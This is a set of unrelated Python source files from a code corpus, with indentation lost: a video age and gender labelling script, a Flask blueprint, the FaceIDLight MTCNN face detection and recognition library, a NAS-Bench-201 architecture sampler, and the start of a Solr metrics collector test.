age_net = cv.dnn.readNetFromCaffe('age_gender_net/deploy_age.prototxt', 'age_gender_net/age_net.caffemodel')
# Mean values for gender_net and age_net
Genders = ['Male', 'Female']
Ages = ['(0-2)', '(4-6)', '(8-12)', '(15-20)', '(25-32)', '(38-43)', '(48-53)', '(60-100)']
def calculateParameters(height_orig, width_orig):
global width, height, diagonal, line_thickness
area = width * height
width = int(math.sqrt(area * width_orig / height_orig))
height = int(math.sqrt(area * height_orig / width_orig))
# Calculate diagonal
diagonal = math.sqrt(height * height + width * width)
# Calculate line thickness to draw boxes
line_thickness = max(1, int(diagonal / 150))
# Initialize output video writer
global out
fps = cap.get(cv.CAP_PROP_FPS)
fourcc = cv.VideoWriter_fourcc(*'XVID')
out = cv.VideoWriter('video.avi', fourcc=fourcc, fps=fps, frameSize=(width, height))
def findFaces(img, confidence_threshold=0.7):
# Get original width and height
height = img.shape[0]
width = img.shape[1]
face_boxes = []
if (face_detector_kind == 'haar'):
# Get grayscale image
gray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)
# Detect faces
detections = face_cascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5)
for (x, y, w, h) in detections:
padding_h = int(math.floor(0.5 + h * face_padding_ratio))
padding_w = int(math.floor(0.5 + w * face_padding_ratio))
x1, y1 = max(0, x - padding_w), max(0, y - padding_h)
x2, y2 = min(x + w + padding_w, width - 1), min(y + h + padding_h, height - 1)
face_boxes.append([x1, y1, x2, y2])
else:
# Convert input image to 3x300x300, as NN model expects only 300x300 RGB images
blob = cv.dnn.blobFromImage(img, 1.0, (300, 300), mean=(104, 117, 123), swapRB=True, crop=False)
# Pass blob through model and get detected faces
face_net.setInput(blob)
detections = face_net.forward()
for i in range(detections.shape[2]):
confidence = detections[0, 0, i, 2]
if (confidence < confidence_threshold):
continue
x1 = int(detections[0, 0, i, 3] * width)
y1 = int(detections[0, 0, i, 4] * height)
x2 = int(detections[0, 0, i, 5] * width)
y2 = int(detections[0, 0, i, 6] * height)
padding_h = int(math.floor(0.5 + (y2 - y1) * face_padding_ratio))
padding_w = int(math.floor(0.5 + (x2 - x1) * face_padding_ratio))
x1, y1 = max(0, x1 - padding_w), max(0, y1 - padding_h)
x2, y2 = min(x2 + padding_w, width - 1), min(y2 + padding_h, height - 1)
face_boxes.append([x1, y1, x2, y2])
return face_boxes
def collectFaces(frame, face_boxes):
faces = []
# Process faces
for i, box in enumerate(face_boxes):
# Convert box coordinates from resized frame_bgr back to original frame
box_orig = [
int(round(box[0] * width_orig / width)),
int(round(box[1] * height_orig / height)),
int(round(box[2] * width_orig / width)),
int(round(box[3] * height_orig / height)),
]
# Extract face box from original frame
face_bgr = frame[
max(0, box_orig[1]):min(box_orig[3] + 1, height_orig - 1),
max(0, box_orig[0]):min(box_orig[2] + 1, width_orig - 1),
:
]
faces.append(face_bgr)
return faces
def predictAgeGender(faces):
if (age_gender_kind == 'ssrnet'):
# Convert faces to N,64,64,3 blob
blob = np.empty((len(faces), face_size, face_size, 3))
for i, face_bgr in enumerate(faces):
blob[i, :, :, :] = cv.resize(face_bgr, (64, 64))
blob[i, :, :, :] = cv.normalize(blob[i, :, :, :], None, alpha=0, beta=255, norm_type=cv.NORM_MINMAX)
# Predict gender and age
genders = gender_net.predict(blob)
ages = age_net.predict(blob)
# Construct labels
labels = ['{},{}'.format('Male' if (gender >= 0.5) else 'Female', int(age)) for (gender, age) in zip(genders, ages)]
else:
# Convert faces to N,3,227,227 blob
blob = cv.dnn.blobFromImages(faces, scalefactor=1.0, size=(227, 227),
mean=(78.4263377603, 87.7689143744, 114.895847746), swapRB=False)
# Predict gender
gender_net.setInput(blob)
genders = gender_net.forward()
# Predict age
age_net.setInput(blob)
ages = age_net.forward()
# Construct labels
labels = ['{},{}'.format(Genders[gender.argmax()], Ages[age.argmax()]) for (gender, age) in zip(genders, ages)]
return labels
# Process video
paused = False
while cap.isOpened():
success, frame = cap.read()
if not success:
break
# Calculate parameters if not yet
if (diagonal is None):
height_orig, width_orig = frame.shape[0:2]
calculateParameters(height_orig, width_orig)
# Resize, Convert BGR to HSV
if ((height, width) != frame.shape[0:2]):
frame_bgr = cv.resize(frame, dsize=(width, height), fx=0, fy=0)
else:
frame_bgr = frame
# Detect faces
face_boxes = findFaces(frame_bgr)
# Make a copy of original image
faces_bgr = frame_bgr.copy()
if (len(face_boxes) > 0):
# Draw boxes in faces_bgr image
for (x1, y1, x2, y2) in face_boxes:
cv.rectangle(faces_bgr, (x1, y1), (x2, y2), color=(0, 255, 0), thickness=line_thickness, lineType=8)
# Collect all faces into matrix
faces = collectFaces(frame, face_boxes)
# Get age and gender
labels = predictAgeGender(faces)
# Draw labels
for (label, box) in zip(labels, face_boxes):
cv.putText(faces_bgr, label, org=(box[0], box[1] - 10), fontFace=cv.FONT_HERSHEY_PLAIN,
fontScale=1, color=(0, 64, 255), thickness=1, lineType=cv.LINE_AA)
# Show frames
cv.imshow('Source', frame_bgr)
cv.imshow('Faces', faces_bgr)
# Write output frame
out.write(faces_bgr)
# Quit on ESC button, pause on SPACE
key = (cv.waitKey(1 if (not paused) else 0) & 0xFF)
if (key == 27):
break
elif (key == 32):
paused = (not paused)
sleep(0.001)
cap.release()
out.release()
cv.destroyAllWindows()
|
StarcoderdataPython
|
238135
|
from flask import Blueprint
user_blueprint = Blueprint('user', __name__, template_folder='templates')
from . import routes
|
StarcoderdataPython
|
3393583
|
<reponame>dualtob/FaceIDLight<gh_stars>1-10
# -*- coding: utf-8 -*-
# MIT License
#
# Copyright (c) 2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Parts of this code are derived and copied from the MTCNN implementation of Iván de Paz Centeno for MTCNN
# https://github.com/ipazc/mtcnn
import tflite_runtime.interpreter as tflite
import cv2
import numpy as np
import os
import glob
from skimage.transform import SimilarityTransform
from FaceIDLight.helper import get_file
from scipy.spatial import distance
from sklearn.metrics.pairwise import cosine_distances
BASE_URL = "https://github.com/Martlgap/FaceIDLight/releases/download/v.0.1/"
FILE_HASHES = {
"o_net": "768385d570300648b7b881acbd418146522b79b4771029bb2e684bdd8c764b9f",
"p_net": "530183192e24f7cc86b6706e1eb600482c4ed4306399ac939c472e3957bae15e",
"r_net": "5ec33b065eb2802bc4c2575d21feff1a56958d854785bc3e2907d3b7ace861a2",
"mobileNet": "6c19b789f661caa8da735566490bfd8895beffb2a1ec97a56b126f0539991aa6",
"resNet50": "f4d8b0194957a3ad766135505fc70a91343660151a8103bbb6c3b8ac34dbb4e2",
"sample_gallery": "9f43a83c89a8099e1f3aab75ed9531f932f1b392bea538d6afe52509587438d4",
}
class FaceID:
def __init__(self, gal_dir: str = None):
self.detector = FaceDetection()
self.recognizer = FaceRecognition()
self.gal_embs = []
self.gal_names = []
self.gal_faces = []
self.gal_dir = (
gal_dir if gal_dir is not None else get_file(BASE_URL + "sample_gallery.zip", FILE_HASHES["sample_gallery"], is_zip=True)
)
self.update_gallery()
def update_gallery(self):
files = glob.glob("{}/*.jpg".format(self.gal_dir)) + glob.glob("{}/*.png".format(self.gal_dir))
for file in files:
img = cv2.imread(file)
# TODO check if image is too large!
detections = self.detector.detect_faces(img) # Must be BGR and float32 [0..255]
if not detections:
continue
_, points, _ = detections[0] # Only take highest-score face
self.gal_names.append(os.path.basename(file).split(".")[0])
face = self.detector.get_face(img, points)
self.gal_faces.append(
cv2.cvtColor(face.astype(np.float32) / 255, cv2.COLOR_BGR2RGB)
) # RGB and float32 [0..1]
# Get all embeddings in parallel
# TODO handle maximum number of parallel invoke
self.gal_embs = self.recognizer.get_emb(np.asarray(self.gal_faces))[0]
def recognize_faces(self, img):
detections = self.detector.detect_faces(img) # Must be BGR and float32 [0..255]
if not detections:
return []
faces = []
for detection in detections:
bbox, points, conf = detection
face = self.detector.get_face(img, points)
faces.append(cv2.cvtColor(face.astype(np.float32) / 255, cv2.COLOR_BGR2RGB))
embs = self.recognizer.get_emb(np.asarray(faces))[0] # RGB float32 [0..1]
ids = []
for i in range(embs.shape[0]):
pred, dist, conf = self.recognizer.identify(np.expand_dims(embs[i], axis=0), self.gal_embs, thresh=0.6)
ids.append(
[
self.gal_names[pred] if pred is not None else "Other",
cv2.cvtColor(self.gal_faces[pred] * 255, cv2.COLOR_RGB2BGR) if pred is not None else None,
dist,
conf,
]
)
faces_ = []
for face in faces:
faces_.append(cv2.cvtColor(face * 255, cv2.COLOR_RGB2BGR))
out = [i for i in zip(faces_, detections, ids)]
return out
def tflite_inference(model, img):
"""Inferences an image through the model with tflite interpreter on CPU
:param model: a tflite.Interpreter loaded with a model
:param img: image
:return: list of outputs of the model
"""
input_details = model.get_input_details()
output_details = model.get_output_details()
model.resize_tensor_input(input_details[0]["index"], img.shape)
model.allocate_tensors()
model.set_tensor(input_details[0]["index"], img.astype(np.float32))
model.invoke()
return [model.get_tensor(elem["index"]) for elem in output_details]
class FaceRecognition:
def __init__(
self,
model_path: str = None,
model_type: str = "mobileNet",
):
if model_path is None:
model_path = get_file(BASE_URL + model_type + ".tflite", FILE_HASHES[model_type])
self.face_recognizer = tflite.Interpreter(model_path=model_path)
def get_emb(self, img):
"""inferences a facial image through the face recognition model
:param img: image with aligned face must be 4-dim
:return: output of the model
Alignment:
Must be like specified TODO
"""
return tflite_inference(self.face_recognizer, img)
@staticmethod
def verify(emb1, emb2, thresh):
"""
TODO
:param emb1:
:param emb2:
:param thresh:
:return:
"""
dist = distance.cosine(emb1, emb2)
prediction = thresh > np.squeeze(dist, axis=-1)
confidence = (
((thresh - dist) / thresh) / 2 + 0.5
if prediction
else ((dist - thresh) / (1.4 - thresh)) / 2 + 0.5
)
return prediction, np.squeeze(dist, axis=-1), confidence
@staticmethod
def identify(emb_src, embs_gal, thresh=None):
"""
TODO
:param emb_src:
:param embs_gal:
:param thresh:
:return:
"""
dists = cosine_distances(emb_src, embs_gal)[0]
pred = np.argmin(dists)
if thresh and dists[pred] > thresh: # if OpenSet set prediction to None if above threshold
idx = np.argsort(dists)
conf = (dists[idx[0]] - thresh) / (1.4 - thresh)
dist = dists[idx[0]]
pred = None
else:
idx = np.argsort(dists)
conf = (dists[idx[1]] - dists[pred]) / 1.4
dist = dists[pred]
return pred, dist, conf
class StageStatus:
"""
Keeps status between MTCNN stages
"""
def __init__(self, pad_result: tuple = None, width=0, height=0):
self.width = width
self.height = height
self.dy = self.edy = self.dx = self.edx = self.y = self.ey = self.x = self.ex = self.tmp_w = self.tmp_h = []
if pad_result is not None:
self.update(pad_result)
def update(self, pad_result: tuple):
s = self
s.dy, s.edy, s.dx, s.edx, s.y, s.ey, s.x, s.ex, s.tmp_w, s.tmp_h = pad_result
class FaceDetection:
"""
Allows to perform MTCNN Detection ->
a) Detection of faces (with the confidence probability)
b) Detection of keypoints (left eye, right eye, nose, mouth_left, mouth_right)
"""
def __init__(
self,
min_face_size: int = 40,
steps_threshold: list = None,
scale_factor: float = 0.7,
):
"""
Initializes the MTCNN.
:param min_face_size: minimum size of the face to detect
:param steps_threshold: step's thresholds values
:param scale_factor: scale factor
"""
if steps_threshold is None:
steps_threshold = [0.6, 0.7, 0.7] # original mtcnn values [0.6, 0.7, 0.7]
self._min_face_size = min_face_size
self._steps_threshold = steps_threshold
self._scale_factor = scale_factor
self.p_net = tflite.Interpreter(
model_path=get_file(BASE_URL + "p_net.tflite", FILE_HASHES["p_net"])
)
self.r_net = tflite.Interpreter(
model_path=get_file(BASE_URL + "r_net.tflite", FILE_HASHES["r_net"])
)
self.o_net = tflite.Interpreter(
model_path=get_file(BASE_URL + "o_net.tflite", FILE_HASHES["o_net"])
)
def detect_faces(self, img):
"""
Detects bounding boxes from the specified image.
:param img: image to process
:return: list containing all the bounding boxes detected with their keypoints.
From MTCNN:
# Total boxes (bBoxes for faces)
# 1. dim -> Number of found Faces
# 2. dim -> x_min, y_min, x_max, y_max, score
# Points (Landmarks left eye, right eye, nose, left mouth, right mouth)
# 1. dim -> Number of found Faces
# 2. dim -> x1, x2, x3, x4, x5, y2, y2, y3, y4, y5 Coordinates
"""
# TODO check if HD or UHD or 4K -> lower the resolution for performance!
height, width, _ = img.shape
stage_status = StageStatus(width=width, height=height)
m = 12 / self._min_face_size
min_layer = np.amin([height, width]) * m
scales = self.__compute_scale_pyramid(m, min_layer)
# We pipe here each of the stages
total_boxes, stage_status = self.__stage1(img, scales, stage_status)
total_boxes, stage_status = self.__stage2(img, total_boxes, stage_status)
bboxes, points = self.__stage3(img, total_boxes, stage_status)
# Transform to better shape and points now inside bbox
detections = []
for i in range(bboxes.shape[0]):
bboxes_c = np.reshape(bboxes[i, :-1], [2, 2]).astype(np.float32)
points_c = np.reshape(points[i], [2, 5]).transpose().astype(np.float32)
conf = bboxes[i, -1].astype(np.float32)
detections.append([bboxes_c, points_c, conf])
return detections
def __compute_scale_pyramid(self, m, min_layer):
scales = []
factor_count = 0
while min_layer >= 12:
scales += [m * np.power(self._scale_factor, factor_count)]
min_layer = min_layer * self._scale_factor
factor_count += 1
return scales
@staticmethod
def __scale_image(image, scale: float):
"""
Scales the image to a given scale.
:param image:
:param scale:
:return:
"""
height, width, _ = image.shape
width_scaled = int(np.ceil(width * scale))
height_scaled = int(np.ceil(height * scale))
im_data = cv2.resize(image, (width_scaled, height_scaled), interpolation=cv2.INTER_AREA)
# Normalize the image's pixels
im_data_normalized = (im_data - 127.5) * 0.0078125
return im_data_normalized
@staticmethod
def __generate_bounding_box(imap, reg, scale, t):
# use heatmap to generate bounding boxes
stride = 2
cellsize = 12
imap = np.transpose(imap)
dx1 = np.transpose(reg[:, :, 0])
dy1 = np.transpose(reg[:, :, 1])
dx2 = np.transpose(reg[:, :, 2])
dy2 = np.transpose(reg[:, :, 3])
y, x = np.where(imap >= t)
if y.shape[0] == 1:
dx1 = np.flipud(dx1)
dy1 = np.flipud(dy1)
dx2 = np.flipud(dx2)
dy2 = np.flipud(dy2)
score = imap[(y, x)]
reg = np.transpose(np.vstack([dx1[(y, x)], dy1[(y, x)], dx2[(y, x)], dy2[(y, x)]]))
if reg.size == 0:
reg = np.empty(shape=(0, 3))
bb = np.transpose(np.vstack([y, x]))
q1 = np.fix((stride * bb + 1) / scale)
q2 = np.fix((stride * bb + cellsize) / scale)
boundingbox = np.hstack([q1, q2, np.expand_dims(score, 1), reg])
return boundingbox, reg
@staticmethod
def __nms(boxes, threshold, method):
"""
Non Maximum Suppression.
:param boxes: np array with bounding boxes.
:param threshold:
:param method: NMS method to apply. Available values ('Min', 'Union')
:return:
"""
if boxes.size == 0:
return np.empty((0, 3))
x1 = boxes[:, 0]
y1 = boxes[:, 1]
x2 = boxes[:, 2]
y2 = boxes[:, 3]
s = boxes[:, 4]
area = (x2 - x1 + 1) * (y2 - y1 + 1)
sorted_s = np.argsort(s)
pick = np.zeros_like(s, dtype=np.int16)
counter = 0
while sorted_s.size > 0:
i = sorted_s[-1]
pick[counter] = i
counter += 1
idx = sorted_s[0:-1]
xx1 = np.maximum(x1[i], x1[idx])
yy1 = np.maximum(y1[i], y1[idx])
xx2 = np.minimum(x2[i], x2[idx])
yy2 = np.minimum(y2[i], y2[idx])
w = np.maximum(0.0, xx2 - xx1 + 1)
h = np.maximum(0.0, yy2 - yy1 + 1)
inter = w * h
if method == "Min":
o = inter / np.minimum(area[i], area[idx])
else:
o = inter / (area[i] + area[idx] - inter)
sorted_s = sorted_s[np.where(o <= threshold)]
pick = pick[0:counter]
return pick
@staticmethod
def __pad(total_boxes, w, h):
# compute the padding coordinates (pad the bounding boxes to square)
tmp_w = (total_boxes[:, 2] - total_boxes[:, 0] + 1).astype(np.int32)
tmp_h = (total_boxes[:, 3] - total_boxes[:, 1] + 1).astype(np.int32)
numbox = total_boxes.shape[0]
dx = np.ones(numbox, dtype=np.int32)
dy = np.ones(numbox, dtype=np.int32)
edx = tmp_w.copy().astype(np.int32)
edy = tmp_h.copy().astype(np.int32)
x = total_boxes[:, 0].copy().astype(np.int32)
y = total_boxes[:, 1].copy().astype(np.int32)
ex = total_boxes[:, 2].copy().astype(np.int32)
ey = total_boxes[:, 3].copy().astype(np.int32)
tmp = np.where(ex > w)
edx.flat[tmp] = np.expand_dims(-ex[tmp] + w + tmp_w[tmp], 1)
ex[tmp] = w
tmp = np.where(ey > h)
edy.flat[tmp] = np.expand_dims(-ey[tmp] + h + tmp_h[tmp], 1)
ey[tmp] = h
tmp = np.where(x < 1)
dx.flat[tmp] = np.expand_dims(2 - x[tmp], 1)
x[tmp] = 1
tmp = np.where(y < 1)
dy.flat[tmp] = np.expand_dims(2 - y[tmp], 1)
y[tmp] = 1
return dy, edy, dx, edx, y, ey, x, ex, tmp_w, tmp_h
@staticmethod
def __rerec(bbox):
# convert bbox to square
height = bbox[:, 3] - bbox[:, 1]
width = bbox[:, 2] - bbox[:, 0]
max_side_length = np.maximum(width, height)
bbox[:, 0] = bbox[:, 0] + width * 0.5 - max_side_length * 0.5
bbox[:, 1] = bbox[:, 1] + height * 0.5 - max_side_length * 0.5
bbox[:, 2:4] = bbox[:, 0:2] + np.transpose(np.tile(max_side_length, (2, 1)))
return bbox
@staticmethod
def __bbreg(boundingbox, reg):
# calibrate bounding boxes
if reg.shape[1] == 1:
reg = np.reshape(reg, (reg.shape[2], reg.shape[3]))
w = boundingbox[:, 2] - boundingbox[:, 0] + 1
h = boundingbox[:, 3] - boundingbox[:, 1] + 1
b1 = boundingbox[:, 0] + reg[:, 0] * w
b2 = boundingbox[:, 1] + reg[:, 1] * h
b3 = boundingbox[:, 2] + reg[:, 2] * w
b4 = boundingbox[:, 3] + reg[:, 3] * h
boundingbox[:, 0:4] = np.transpose(np.vstack([b1, b2, b3, b4]))
return boundingbox
def __stage1(self, image, scales: list, stage_status: StageStatus):
"""
First stage of the MTCNN.
:param image:
:param scales:
:param stage_status:
:return:
"""
total_boxes = np.empty((0, 9))
status = stage_status
for scale in scales:
scaled_image = self.__scale_image(image, scale)
img_x = np.expand_dims(scaled_image, 0)
img_y = np.transpose(img_x, (0, 2, 1, 3))
out = tflite_inference(self.p_net, img_y)
out0 = np.transpose(out[0], (0, 2, 1, 3))
out1 = np.transpose(out[1], (0, 2, 1, 3))
boxes, _ = self.__generate_bounding_box(
out1[0, :, :, 1].copy(),
out0[0, :, :, :].copy(),
scale,
self._steps_threshold[0],
)
# inter-scale nms
pick = self.__nms(boxes.copy(), 0.5, "Union")
if boxes.size > 0 and pick.size > 0:
boxes = boxes[pick, :]
total_boxes = np.append(total_boxes, boxes, axis=0)
numboxes = total_boxes.shape[0]
if numboxes > 0:
pick = self.__nms(total_boxes.copy(), 0.7, "Union")
total_boxes = total_boxes[pick, :]
regw = total_boxes[:, 2] - total_boxes[:, 0]
regh = total_boxes[:, 3] - total_boxes[:, 1]
qq1 = total_boxes[:, 0] + total_boxes[:, 5] * regw
qq2 = total_boxes[:, 1] + total_boxes[:, 6] * regh
qq3 = total_boxes[:, 2] + total_boxes[:, 7] * regw
qq4 = total_boxes[:, 3] + total_boxes[:, 8] * regh
total_boxes = np.transpose(np.vstack([qq1, qq2, qq3, qq4, total_boxes[:, 4]]))
total_boxes = self.__rerec(total_boxes.copy())
total_boxes[:, 0:4] = np.fix(total_boxes[:, 0:4]).astype(np.int32)
status = StageStatus(
self.__pad(total_boxes.copy(), stage_status.width, stage_status.height),
width=stage_status.width,
height=stage_status.height,
)
return total_boxes, status
def __stage2(self, img, total_boxes, stage_status: StageStatus):
"""
Second stage of the MTCNN.
:param img:
:param total_boxes:
:param stage_status:
:return:
"""
num_boxes = total_boxes.shape[0]
if num_boxes == 0:
return total_boxes, stage_status
# second stage
tempimg = np.zeros(shape=(24, 24, 3, num_boxes))
for k in range(0, num_boxes):
tmp = np.zeros((int(stage_status.tmp_h[k]), int(stage_status.tmp_w[k]), 3))
tmp[stage_status.dy[k] - 1 : stage_status.edy[k], stage_status.dx[k] - 1 : stage_status.edx[k], :,] = img[
stage_status.y[k] - 1 : stage_status.ey[k],
stage_status.x[k] - 1 : stage_status.ex[k],
:,
]
if tmp.shape[0] > 0 and tmp.shape[1] > 0 or tmp.shape[0] == 0 and tmp.shape[1] == 0:
tempimg[:, :, :, k] = cv2.resize(tmp, (24, 24), interpolation=cv2.INTER_AREA)
else:
return np.empty(shape=(0,)), stage_status
tempimg = (tempimg - 127.5) * 0.0078125
tempimg1 = np.transpose(tempimg, (3, 1, 0, 2))
out = tflite_inference(self.r_net, tempimg1)
out0 = np.transpose(out[0])
out1 = np.transpose(out[1])
score = out1[1, :]
ipass = np.where(score > self._steps_threshold[1])
total_boxes = np.hstack([total_boxes[ipass[0], 0:4].copy(), np.expand_dims(score[ipass].copy(), 1)])
mv = out0[:, ipass[0]]
if total_boxes.shape[0] > 0:
pick = self.__nms(total_boxes, 0.7, "Union")
total_boxes = total_boxes[pick, :]
total_boxes = self.__bbreg(total_boxes.copy(), np.transpose(mv[:, pick]))
total_boxes = self.__rerec(total_boxes.copy())
return total_boxes, stage_status
def __stage3(self, img, total_boxes, stage_status: StageStatus):
"""
Third stage of the MTCNN.
:param img:
:param total_boxes:
:param stage_status:
:return:
"""
num_boxes = total_boxes.shape[0]
if num_boxes == 0:
return total_boxes, np.empty(shape=(0,))
total_boxes = np.fix(total_boxes).astype(np.int32)
status = StageStatus(
self.__pad(total_boxes.copy(), stage_status.width, stage_status.height),
width=stage_status.width,
height=stage_status.height,
)
tempimg = np.zeros((48, 48, 3, num_boxes))
for k in range(0, num_boxes):
tmp = np.zeros((int(status.tmp_h[k]), int(status.tmp_w[k]), 3))
tmp[status.dy[k] - 1 : status.edy[k], status.dx[k] - 1 : status.edx[k], :] = img[
status.y[k] - 1 : status.ey[k], status.x[k] - 1 : status.ex[k], :
]
if tmp.shape[0] > 0 and tmp.shape[1] > 0 or tmp.shape[0] == 0 and tmp.shape[1] == 0:
tempimg[:, :, :, k] = cv2.resize(tmp, (48, 48), interpolation=cv2.INTER_AREA)
else:
return np.empty(shape=(0,)), np.empty(shape=(0,))
tempimg = (tempimg - 127.5) * 0.0078125
tempimg1 = np.transpose(tempimg, (3, 1, 0, 2))
out = tflite_inference(self.o_net, tempimg1)
out0 = np.transpose(out[0])
out1 = np.transpose(out[1])
out2 = np.transpose(out[2])
score = out2[1, :]
points = out1
ipass = np.where(score > self._steps_threshold[2])
points = points[:, ipass[0]]
total_boxes = np.hstack([total_boxes[ipass[0], 0:4].copy(), np.expand_dims(score[ipass].copy(), 1)])
mv = out0[:, ipass[0]]
w = total_boxes[:, 2] - total_boxes[:, 0] + 1
h = total_boxes[:, 3] - total_boxes[:, 1] + 1
points[0:5, :] = np.tile(w, (5, 1)) * points[0:5, :] + np.tile(total_boxes[:, 0], (5, 1)) - 1
points[5:10, :] = np.tile(h, (5, 1)) * points[5:10, :] + np.tile(total_boxes[:, 1], (5, 1)) - 1
if total_boxes.shape[0] > 0:
total_boxes = self.__bbreg(total_boxes.copy(), np.transpose(mv))
pick = self.__nms(total_boxes.copy(), 0.7, "Min")
total_boxes = total_boxes[pick, :]
points = points[:, pick]
return total_boxes, points.transpose()
@staticmethod
def get_face(img, dst, target_size=(112, 112)):
"""
:param img: image
:param dst:
:param target_size:
:return:
"""
src = np.array(
[
[38.2946, 51.6963],
[73.5318, 51.5014],
[56.0252, 71.7366],
[41.5493, 92.3655],
[70.7299, 92.2041],
],
dtype=np.float32,
)
tform = SimilarityTransform()
tform.estimate(dst, src)
tmatrix = tform.params[0:2, :]
return cv2.warpAffine(img, tmatrix, target_size, borderValue=0.0)
|
StarcoderdataPython
|
4962561
|
<reponame>apourchot/to_share_or_not_to_share<filename>models/nasbench_201/graph_sampler.py
import pickle
import numpy as np
class GraphSampler(object):
"""
Sample architectures uniformly from available dataset
"""
def __init__(self, dataset_path, **kwargs):
super(GraphSampler, self).__init__()
# load dataset
with open(dataset_path, "rb") as f:
self.dataset = pickle.load(f)
print("Number of architectures: {}".format(len(self.dataset)))
# build probs
self.probs = np.ones(len(self.dataset))
self.probs = self.probs / np.sum(self.probs)
print("Probs: ", self.probs)
def sample(self, n_monte=1, return_metrics=False):
"""
Samples n_monte architecture
:param n_monte:
:param return_metrics: whether to return the metrics associated with the architecture
:return: a list of matrices and operations describing
the sampled architecture
"""
matrices = []
metrics = []
# sampling an architecture n_monte times
for n in range(n_monte):
# sampling datum
data = self.dataset[np.random.choice(len(self.dataset), p=self.probs)]
# matrix used for all tasks
matrix = data["architecture"]
matrices.append(matrix)
# append metrics if necessary
if return_metrics:
metrics.append(data)
if return_metrics:
return list(zip(matrices, metrics))
return list(matrices)
def get(self, n, return_metrics):
"""
Returns the nth architecture
:param n:
:param return_metrics: whether to return the metrics associated with the architecture
:return: a list of matrices and operations describing
the sampled architecture
"""
assert n < len(self.dataset)
matrices = []
metrics = []
# sampling datum
data = self.dataset[n]
# matrix used for all tasks
matrix = data["architecture"]
matrices.append(matrix)
# append metrics if necessary
if return_metrics:
metrics.append(data)
if return_metrics:
return list(zip(matrices, metrics))
return list(matrices)
def get_all(self, return_metrics):
matrices = []
metrics = None
if return_metrics:
metrics = []
# sampling an architecture n_monte times
for n in range(len(self.dataset)):
# sampling datum
data = self.dataset[n]
# matrix used for all tasks
matrix = data["architecture"]
matrices.append(matrix)
# append metrics if necessary
if return_metrics:
metrics.append(data)
if return_metrics:
return list(zip(matrices, metrics))
return list(matrices)
def get_random_perm(self):
return np.random.permutation(range(len(self.dataset)))
|
StarcoderdataPython
|
141505
|
#!/usr/bin/python
# coding=utf-8
##########################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
from diamond.collector import Collector
from solr import SolrCollector
##########################################################################
class TestSolrCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('SolrCollector', {})
self.collector = SolrCollector(config, None)
def test_import(self):
self.assertTrue(SolrCollector)
@patch.object(Collector, 'publish')
def test_should_work_with_real_data(self, publish_mock):
returns = [self.getFixture('cores'),
self.getFixture('ping'),
self.getFixture('stats'),
self.getFixture('system')]
urlopen_mock = patch('urllib2.urlopen', Mock(
side_effect=lambda *args: returns.pop(0)))
urlopen_mock.start()
self.collector.collect()
urlopen_mock.stop()
metrics = {
'response.QueryTime': 5,
'response.Status': 0,
"core.maxDoc": 321,
"core.numDocs": 184,
"core.warmupTime": 0,
"queryhandler.standard.requests": 3,
"queryhandler.standard.errors": 0,
"queryhandler.standard.timeouts": 0,
"queryhandler.standard.totalTime": 270,
"queryhandler.standard.avgTimePerRequest": 90,
"queryhandler.standard.avgRequestsPerSecond": 0.00016776958,
"queryhandler.replication.requests": 2105,
"queryhandler.replication.errors": 0,
"queryhandler.replication.timeouts": 0,
"queryhandler.replication.totalTime": 17982.93376,
"queryhandler.replication.avgTimePerRequest": 8.542961406175772,
"queryhandler.replication.avgRequestsPerSecond": 0.16194770586582,
"queryhandler.update.requests": 0,
"queryhandler.update.errors": 0,
"queryhandler.update.timeouts": 0,
"queryhandler.update.totalTime": 0,
"queryhandler.update.avgRequestsPerSecond": 0,
"updatehandler.commits": 0,
"updatehandler.autocommits": 0,
"updatehandler.optimizes": 0,
"updatehandler.rollbacks": 0,
"updatehandler.docsPending": 0,
"updatehandler.adds": 0,
"updatehandler.errors": 0,
"updatehandler.cumulative_adds": 0,
"updatehandler.cumulative_errors": 0,
'cache.fieldValueCache.lookups': 0,
'cache.fieldValueCache.hits': 0,
'cache.fieldValueCache.hitratio': 0.0,
'cache.fieldValueCache.inserts': 0,
'cache.fieldValueCache.evictions': 0,
'cache.fieldValueCache.size': 0,
'cache.fieldValueCache.warmupTime': 0,
'cache.fieldValueCache.cumulative_lookups': 0,
'cache.fieldValueCache.cumulative_hits': 0,
'cache.fieldValueCache.cumulative_hitratio': 0.0,
'cache.fieldValueCache.cumulative_inserts': 0,
'cache.fieldValueCache.cumulative_evictions': 0,
'cache.filterCache.lookups': 0,
'cache.filterCache.hits': 0,
'cache.filterCache.hitratio': 0.0,
'cache.filterCache.inserts': 0,
'cache.filterCache.evictions': 0,
'cache.filterCache.size': 0,
'cache.filterCache.warmupTime': 0,
'cache.filterCache.cumulative_lookups': 0,
'cache.filterCache.cumulative_hits': 0,
'cache.filterCache.cumulative_hitratio': 0.0,
'cache.filterCache.cumulative_inserts': 0,
'cache.filterCache.cumulative_evictions': 0,
'cache.documentCache.lookups': 0,
'cache.documentCache.hits': 0,
'cache.documentCache.hitratio': 0.0,
'cache.documentCache.inserts': 0,
'cache.documentCache.evictions': 0,
'cache.documentCache.size': 0,
'cache.documentCache.warmupTime': 0,
'cache.documentCache.cumulative_lookups': 0,
'cache.documentCache.cumulative_hits': 0,
'cache.documentCache.cumulative_hitratio': 0.0,
'cache.documentCache.cumulative_inserts': 0,
'cache.documentCache.cumulative_evictions': 0,
'cache.queryResultCache.lookups': 3,
'cache.queryResultCache.hits': 2,
